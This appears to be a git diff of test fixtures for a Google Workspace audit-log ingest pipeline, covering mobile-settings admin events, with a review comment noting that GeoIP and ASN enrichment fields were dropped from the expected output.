+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json
index 29c8b0502ef..e3609db5e6d 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -36,35 +36,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821594900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977331400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "ACTION_CANCELLED",
 "id": "1",
@@ -95,7 +77,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
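Review bot: The regenerated expected document in this hunk drops the `source.geo` and `source.as` objects that the previous fixture asserted, so the pipeline test no longer verifies that GeoIP and ASN enrichment of `source.ip` happens at all; a regression that silently skips the geoip processor would now pass. Whether the test stack's GeoIP database is meant to resolve 67.43.156.13 cannot be told from the diff; if it is, the fixture should be regenerated so the enrichment fields come back, and if it is not, the loss of enrichment coverage deserves a sentence in the PR description. The same removal repeats in every 35-to-17-line hunk of this file (old lines 121, 204, 286, 368, 450, 532, 614, 696, 778 and 860 in this chunk), and the file section continues beyond it.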
@@ -121,35 +103,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821602500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977336100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "ACTION_REQUESTED",
 "id": "1",
@@ -180,7 +144,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -204,35 +168,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821604800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977342Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "ADD_MOBILE_CERTIFICATE",
 "id": "1",
@@ -262,7 +208,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -286,35 +232,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821607Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
+ "ingested": "2021-12-09T13:38:46.977346Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
 "provider": "admin",
 "action": "COMPANY_DEVICES_BULK_CREATION",
 "id": "1",
@@ -344,7 +272,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -368,35 +296,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821609100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977351400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_BLOCKED",
 "id": "1",
@@ -426,7 +336,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -450,35 +360,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821611500Z",
